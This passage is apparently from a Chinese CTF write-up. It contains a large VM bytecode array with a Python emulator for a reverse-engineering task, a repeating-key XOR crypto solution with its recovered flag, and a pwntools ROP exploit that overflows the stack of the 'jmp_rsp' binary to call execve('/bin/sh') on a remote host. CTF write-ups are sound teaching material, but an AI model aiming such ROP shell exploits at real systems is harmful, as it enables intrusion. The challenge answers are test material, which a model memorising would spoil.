6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 3751, 3751, 7, 7, 7, 0, 3754, 0, 0, 6602, 6602, 3752, 6625, 6625, 3753, 3766, 3766, 7, 7, 7, 0, 3769, 0, 0, 6602, 6602, 3767, 3753, 3753, 3768, 3767, 3768, 7, 7, 7, 7, 7, 7, 3753, 3790, 3790, 7, 7, 7, 0, 3793, 0, 0, 6625, 6625, 3791, 3752, 3752, 3792, 3791, 3792, 7, 7, 7, 7, 7, 7, 3752, 3752, 3753, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6652, 6652, 7, 7, 7, 6652, 1, 1, 7, 7, 7, 6602, 3838, 3838, 7, 7, 7, 0, 3841, 0, 0, 6602, 6602, 3839, 6613, 6613, 3840, 3853, 3853, 7, 7, 7, 0, 3856, 0, 0, 6602, 6602, 3854, 3840, 3840, 3855, 3854, 3855, 7, 7, 7, 7, 7, 7, 3840, 3877, 3877, 7, 7, 7, 0, 3880, 0, 0, 6613, 6613, 3878, 3839, 3839, 3879, 3878, 3879, 7, 7, 7, 7, 7, 7, 3839, 3839, 3840, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 3913, 3913, 7, 7, 7, 0, 3916, 0, 0, 6653, 6653, 3914, 6612, 6612, 3915, 3928, 3928, 7, 7, 7, 0, 3931, 0, 0, 6653, 6653, 3929, 3915, 3915, 3930, 3929, 3930, 7, 7, 7, 7, 7, 7, 3915, 3952, 3952, 7, 7, 7, 0, 3955, 0, 0, 6612, 6612, 3953, 3914, 3914, 3954, 3953, 3954, 7, 7, 7, 7, 7, 7, 3914, 3914, 3915, 7, 7, 7, 6602, 3982, 3982, 7, 7, 7, 0, 3985, 0, 0, 6602, 6602, 3983, 6626, 6626, 3984, 3997, 3997, 7, 7, 7, 0, 4000, 0, 0, 6602, 6602, 3998, 3984, 3984, 3999, 3998, 3999, 7, 7, 7, 7, 7, 7, 3984, 4021, 4021, 7, 7, 7, 0, 4024, 0, 0, 6626, 6626, 4022, 3983, 3983, 4023, 4022, 4023, 7, 7, 7, 7, 7, 7, 3983, 3983, 3984, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6654, 6654, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 4243, 4243, 7, 7, 7, 0, 4246, 0, 0, 6602, 6602, 4244, 6607, 6607, 4245, 4258, 4258, 7, 7, 7, 0, 4261, 0, 0, 6602, 6602, 4259, 4245, 4245, 4260, 4259, 4260, 7, 7, 7, 7, 7, 7, 4245, 4282, 4282, 7, 7, 7, 0, 4285, 0, 0, 6607, 6607, 4283, 4244, 4244, 4284, 4283, 4284, 7, 7, 7, 7, 7, 7, 4244, 4244, 4245, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6655, 6655, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 4504, 4504, 7, 7, 7, 0, 4507, 0, 0, 6602, 6602, 4505, 6627, 6627, 4506, 4519, 4519, 7, 7, 7, 0, 4522, 0, 0, 6602, 6602, 4520, 4506, 4506, 4521, 4520, 4521, 7, 7, 7, 7, 7, 7, 4506, 4543, 4543, 7, 7, 7, 0, 4546, 0, 0, 6627, 6627, 4544, 4505, 4505, 4545, 4544, 4545, 7, 7, 7, 7, 7, 7, 4505, 4505, 4506, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 4579, 4579, 7, 7, 7, 0, 4582, 0, 0, 6656, 6656, 4580, 6619, 6619, 4581, 4594, 4594, 7, 7, 7, 0, 4597, 0, 0, 6656, 6656, 4595, 4581, 4581, 4596, 4595, 4596, 7, 7, 7, 7, 7, 7, 4581, 4618, 4618, 7, 7, 7, 0, 4621, 0, 0, 6619, 6619, 4619, 4580, 4580, 4620, 4619, 4620, 7, 7, 7, 7, 7, 7, 4580, 4580, 4581, 7, 7, 7, 6602, 4648, 4648, 7, 7, 7, 0, 4651, 0, 0, 6602, 6602, 4649, 6628, 6628, 4650, 4663, 4663, 7, 7, 7, 0, 4666, 0, 0, 6602, 6602, 4664, 4650, 4650, 4665, 4664, 4665, 7, 7, 7, 7, 7, 7, 4650, 4687, 4687, 7, 7, 7, 0, 4690, 0, 0, 6628, 6628, 4688, 4649, 4649, 4689, 4688, 4689, 7, 7, 7, 7, 7, 7, 4649, 4649, 4650, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6657, 6657, 7, 7, 7, 6657, 1, 1, 7, 7, 7, 6602, 4735, 4735, 7, 7, 7, 0, 4738, 0, 0, 6602, 6602, 4736, 6614, 6614, 4737, 4750, 4750, 7, 7, 7, 0, 4753, 0, 0, 6602, 6602, 4751, 4737, 4737, 4752, 4751, 4752, 7, 7, 7, 7, 7, 7, 4737, 4774, 4774, 7, 7, 7, 0, 4777, 0, 0, 6614, 6614, 4775, 4736, 4736, 4776, 4775, 4776, 7, 7, 7, 7, 7, 7, 4736, 4736, 4737, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 4810, 4810, 7, 7, 7, 0, 4813, 0, 0, 6658, 6658, 4811, 6632, 6632, 4812, 4825, 4825, 7, 7, 7, 0, 4828, 0, 0, 6658, 6658, 4826, 4812, 4812, 4827, 4826, 4827, 7, 7, 7, 7, 7, 7, 4812, 4849, 4849, 7, 7, 7, 0, 4852, 0, 0, 6632, 6632, 4850, 4811, 4811, 4851, 4850, 4851, 7, 7, 7, 7, 7, 7, 4811, 4811, 4812, 7, 7, 7, 6602, 4879, 4879, 7, 7, 7, 0, 4882, 0, 0, 6602, 6602, 4880, 6630, 6630, 4881, 4894, 4894, 7, 7, 7, 0, 4897, 0, 0, 6602, 6602, 4895, 4881, 4881, 4896, 4895, 4896, 7, 7, 7, 7, 7, 7, 4881, 4918, 4918, 7, 7, 7, 0, 4921, 0, 0, 6630, 6630, 4919, 4880, 4880, 4920, 4919, 4920, 7, 7, 7, 7, 7, 7, 4880, 4880, 4881, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6659, 6659, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 5140, 5140, 7, 7, 7, 0, 5143, 0, 0, 6602, 6602, 5141, 6620, 6620, 5142, 5155, 5155, 7, 7, 7, 0, 5158, 0, 0, 6602, 6602, 5156, 5142, 5142, 5157, 5156, 5157, 7, 7, 7, 7, 7, 7, 5142, 5179, 5179, 7, 7, 7, 0, 5182, 0, 0, 6620, 6620, 5180, 5141, 5141, 5181, 5180, 5181, 7, 7, 7, 7, 7, 7, 5141, 5141, 5142, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 5215, 5215, 7, 7, 7, 0, 5217, 0, 5216, 5216, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 8, 8, 7, 7, 7, 8, 1, 1, 7, 7, 7, 8, 8, 454, 7, 7, 7, 8, 5505, 5505, 7, 7, 7, 0, 5508, 5708, 5574, 5514, 5514, 7, 7, 7, 0, 5517, 0, 0, 5523, 5523, 7, 7, 7, 0, 5526, 0, 0, 5507, 5507, 5524, 8, 8, 5525, 5524, 5525, 7, 7, 7, 7, 7, 7, 5515, 8, 8, 5516, 5550, 5550, 7, 7, 7, 0, 5553, 0, 0, 5506, 5506, 5551, 5516, 5516, 5552, 5551, 5552, 7, 7, 7, 7, 7, 7, 5516, 5515, 5516, 7, 7, 7, 0, 6669, 6669, 7, 7, 7, 3, 5586, 5586, 7, 7, 7, 0, 5588, 1, 5587, 5587, 7, 7, 7, 4, 6663, 6663, 7, 7, 7, 3, 5606, 5606, 7, 7, 7, 0, 5608, 1, 5607, 5607, 7, 7, 7, 4, 6664, 6664, 7, 7, 7, 3, 5626, 5626, 7, 7, 7, 0, 5628, 1, 5627, 5627, 7, 7, 7, 4, 6683, 6683, 7, 7, 7, 3, 5646, 5646, 7, 7, 7, 0, 5648, 1, 5647, 5647, 7, 7, 7, 4, 6672, 6672, 7, 7, 7, 3, 5666, 5666, 7, 7, 7, 0, 5668, 1, 5667, 5667, 7, 7, 7, 4, 6680, 6680, 7, 7, 7, 3, 5686, 5686, 7, 7, 7, 0, 5688, 1, 5687, 5687, 7, 7, 7, 4, 5700, 5700, 7, 7, 7, 0, 5702, 65535, 5701, 5701, 7, 7, 7, 0, 6673, 6673, 7, 7, 7, 3, 5720, 5720, 7, 7, 7, 0, 5722, 1, 5721, 5721, 7, 7, 7, 4, 6664, 6664, 7, 7, 7, 3, 5740, 5740, 7, 7, 7, 0, 5742, 1, 5741, 5741, 7, 7, 7, 4, 6663, 6663, 7, 7, 7, 3, 5760, 5760, 7, 7, 7, 0, 5762, 1, 5761, 5761, 7, 7, 7, 4, 6663, 6663, 7, 7, 7, 3, 5780, 5780, 7, 7, 7, 0, 5782, 1, 5781, 5781, 7, 7, 7, 4, 6679, 6679, 7, 7, 7, 3, 5800, 5800, 7, 7, 7, 0, 5802, 1, 5801, 5801, 7, 7, 7, 4, 6677, 6677, 7, 7, 7, 3, 5820, 5820, 7, 7, 7, 0, 5822, 1, 5821, 5821, 7, 7, 7, 4, 6671, 6671, 7, 7, 7, 3, 5840, 5840, 7, 7, 7, 0, 5842, 1, 5841, 5841, 7, 7, 7, 4, 6680, 6680, 7, 7, 7, 3, 5860, 5860, 7, 7, 7, 0, 5862, 1, 5861, 5861, 7, 7, 7, 4, 6678, 6678, 7, 7, 7, 3, 5880, 5880, 7, 7, 7, 0, 5882, 1, 5881, 5881, 7, 7, 7, 4, 6662, 6662, 7, 7, 7, 3, 5900, 5900, 7, 7, 7, 0, 5902, 1, 5901, 5901, 7, 7, 7, 4, 6665, 6665, 7, 7, 7, 3, 5920, 5920, 7, 7, 7, 0, 5922, 1, 5921, 5921, 7, 7, 7, 4, 6672, 6672, 7, 7, 7, 3, 5940, 5940, 7, 7, 7, 0, 5942, 1, 5941, 5941, 7, 7, 7, 4, 6676, 6676, 7, 7, 7, 3, 5960, 5960, 7, 7, 7, 0, 5962, 1, 5961, 5961, 7, 7, 7, 4, 6678, 6678, 7, 7, 7, 3, 5980, 5980, 7, 7, 7, 0, 5982, 1, 5981, 5981, 7, 7, 7, 4, 6662, 6662, 7, 7, 7, 3, 6000, 6000, 7, 7, 7, 0, 6002, 1, 6001, 6001, 7, 7, 7, 4, 6665, 6665, 7, 7, 7, 3, 6020, 6020, 7, 7, 7, 0, 6022, 1, 6021, 6021, 7, 7, 7, 4, 6672, 6672, 7, 7, 7, 3, 6040, 6040, 7, 7, 7, 0, 6042, 1, 6041, 6041, 7, 7, 7, 4, 6681, 6681, 7, 7, 7, 3, 6060, 6060, 7, 7, 7, 0, 6062, 1, 6061, 6061, 7, 7, 7, 4, 6635, 6635, 7, 7, 7, 3, 6080, 6080, 7, 7, 7, 0, 6082, 1, 6081, 6081, 7, 7, 7, 4, 6636, 6636, 7, 7, 7, 3, 6100, 6100, 7, 7, 7, 0, 6102, 1, 6101, 6101, 7, 7, 7, 4, 6637, 6637, 7, 7, 7, 3, 6120, 6120, 7, 7, 7, 0, 6122, 1, 6121, 6121, 7, 7, 7, 4, 6638, 6638, 7, 7, 7, 3, 6140, 6140, 7, 7, 7, 0, 6142, 1, 6141, 6141, 7, 7, 7, 4, 6639, 6639, 7, 7, 7, 3, 6160, 6160, 7, 7, 7, 0, 6162, 1, 6161, 6161, 7, 7, 7, 4, 6640, 6640, 7, 7, 7, 3, 6180, 6180, 7, 7, 7, 0, 6182, 1, 6181, 6181, 7, 7, 7, 4, 6641, 6641, 7, 7, 7, 3, 6200, 6200, 7, 7, 7, 0, 6202, 1, 6201, 6201, 7, 7, 7, 4, 6642, 6642, 7, 7, 7, 3, 6220, 6220, 7, 7, 7, 0, 6222, 1, 6221, 6221, 7, 7, 7, 4, 6643, 6643, 7, 7, 7, 3, 6240, 6240, 7, 7, 7, 0, 6242, 1, 6241, 6241, 7, 7, 7, 4, 6644, 6644, 7, 7, 7, 3, 6260, 6260, 7, 7, 7, 0, 6262, 1, 6261, 6261, 7, 7, 7, 4, 6645, 6645, 7, 7, 7, 3, 6280, 6280, 7, 7, 7, 0, 6282, 1, 6281, 6281, 7, 7, 7, 4, 6646, 6646, 7, 7, 7, 3, 6300, 6300, 7, 7, 7, 0, 6302, 1, 6301, 6301, 7, 7, 7, 4, 6647, 6647, 7, 7, 7, 3, 6320, 6320, 7, 7, 7, 0, 6322, 1, 6321, 6321, 7, 7, 7, 4, 6648, 6648, 7, 7, 7, 3, 6340, 6340, 7, 7, 7, 0, 6342, 1, 6341, 6341, 7, 7, 7, 4, 6649, 6649, 7, 7, 7, 3, 6360, 6360, 7, 7, 7, 0, 6362, 1, 6361, 6361, 7, 7, 7, 4, 6650, 6650, 7, 7, 7, 3, 6380, 6380, 7, 7, 7, 0, 6382, 1, 6381, 6381, 7, 7, 7, 4, 6651, 6651, 7, 7, 7, 3, 6400, 6400, 7, 7, 7, 0, 6402, 1, 6401, 6401, 7, 7, 7, 4, 6652, 6652, 7, 7, 7, 3, 6420, 6420, 7, 7, 7, 0, 6422, 1, 6421, 6421, 7, 7, 7, 4, 6653, 6653, 7, 7, 7, 3, 6440, 6440, 7, 7, 7, 0, 6442, 1, 6441, 6441, 7, 7, 7, 4, 6654, 6654, 7, 7, 7, 3, 6460, 6460, 7, 7, 7, 0, 6462, 1, 6461, 6461, 7, 7, 7, 4, 6655, 6655, 7, 7, 7, 3, 6480, 6480, 7, 7, 7, 0, 6482, 1, 6481, 6481, 7, 7, 7, 4, 6656, 6656, 7, 7, 7, 3, 6500, 6500, 7, 7, 7, 0, 6502, 1, 6501, 6501, 7, 7, 7, 4, 6657, 6657, 7, 7, 7, 3, 6520, 6520, 7, 7, 7, 0, 6522, 1, 6521, 6521, 7, 7, 7, 4, 6658, 6658, 7, 7, 7, 3, 6540, 6540, 7, 7, 7, 0, 6542, 1, 6541, 6541, 7, 7, 7, 4, 6659, 6659, 7, 7, 7, 3, 6560, 6560, 7, 7, 7, 0, 6562, 1, 6561, 6561, 7, 7, 7, 4, 6682, 6682, 7, 7, 7, 3, 6580, 6580, 7, 7, 7, 0, 6582, 1, 6581, 6581, 7, 7, 7, 4, 6594, 6594, 7, 7, 7, 0, 6596, 65535, 6595, 6595, 7, 7, 7, 0, 0, 2, 70, 18, 87, 24, 216, 154, 96, 32, 99, 228, 164, 103, 40, 41, 234, 106, 43, 46, 32815, 124, 113, 32818, 60, 51, 53, 54, 62, 126, 123, 32828, 190, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 117, 74, 108, 114, 111, 97, 80, 115, 119, 87, 100, 116, 103, 67, 84, 83, 58, 99, 70, 101, 33, 123, 125, 110, 0]
print((len(vmc)))
for i in range(300):
    vmc.insert(0,0)

vmc[0]=300
t=[]

print(vmc[0x1c6])

vmc[0] = 300
while 1:
    v6=vmc[0]
    if(v6>6385):
        break
    offset1=vmc[v6]
    offset2=vmc[v6+1]
    offset3=vmc[v6+2]
    t.append(hex(offset1))
    t.append(hex(offset2))
    t.append(hex(offset3))
    print(v6,t)
    t=[]
    vmc[0]+=3
    v10=qufan(vmc[offset1]|vmc[offset2])
    vmc[offset3]=v10
    vmc[1]=circular_shift_left(v10,1,8)
    print(vmc[1])

根据提取出的执行流可以分析出三个主要的数据操作：
1.input_value^static_value_1^static_vlaue_2
2.(input_value ROL 15)^static_vlaue
3.input_value^static_value

最后等官方wp

Crypto

crypto-xor2

签到题二号（确信

from secret import flag

key = "xxxx" # not real key

cipher = ""
for i, c in enumerate(flag):
    cipher += chr(ord(c) ^ ord(key[i%4]))

with open("cipher", "w") as f:
    f.write(cipher)

就是非常普通的逐位异或
题目给出了flag格式，显然明文前四位是”flag”
和密文前四位异或一下就可以得到key了
没错，key就是”xxxx”
“not real key”

m = ""
key = "xxxx"
with open("cipher", "r") as f:
    cipher = f.read()
for i, c in enumerate(cipher):
    m += chr(ord(c) ^ ord(key[i%4]))
print(m)

得到flag{fccb0665-bce5-d329-aca7-99179bdc9ed3}

Pwn

jmp_rsp

静态链接文件。
检查保护：

IDA分析，存在栈溢出

没有提供system函数和/bin/sh字符串，又是个静态链接文件，考虑构造execve(“/bin/sh”,0,0)来获得shell。
利用ROPgadget找到一些可用的gadget：

pop_rdi = 0x400696 pop_rsi = 0x410173 pop_rdx = 0x449395 pop_rax = 0x415174 syscall = 0x40120c ret = 0x400416

思路：先调用 read 函数在 bss 段写入 “/bin/sh” 字符串，然后布置好 rax（execve的系统调用号）、rdi（”/bin/sh”的地址）、rsi（0） 和 rdx（0） 后通过 syscall 调用 execve(“/bin/sh”,0,0)。

from pwn import *
context(log_level = 'debug',arch='amd64',os='linux')

#p = process('./jmp_rsp')
p = remote('47.106.122.102',44672)

pop_rdi = 0x400696
pop_rsi = 0x410173
pop_rdx = 0x449395
pop_rax = 0x415174
main = 0x400B5D
syscall = 0x40120c
read = 0x449380
bss_addr = 0x6BC820
ret = 0x400416

payload1 = b'a'*136 + p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(bss_addr) + p64(pop_rdx) + p64(0x8) + p64(read) + p64(main)
p.sendline(payload1)
sleep(1)
p.send(b'/bin/sh\x00')
#gdb.attach(p)
#pause()
payload2 = b'a'*136 + p64(ret) + p64(pop_rdi) + p64(bss_addr) + p64(pop_rsi) + p64(0) + p64(pop_rdx) + p64(0) + p64(pop_rax) + p64(0x3b) + p64(syscall)
p.sendline(payload2)

p.interactive()

由于栈上没有开保护，可以执行shellcode，所以还有另一种解法，方法参考https://www.yuque.com/cyberangel/rg9gdm/bxq173。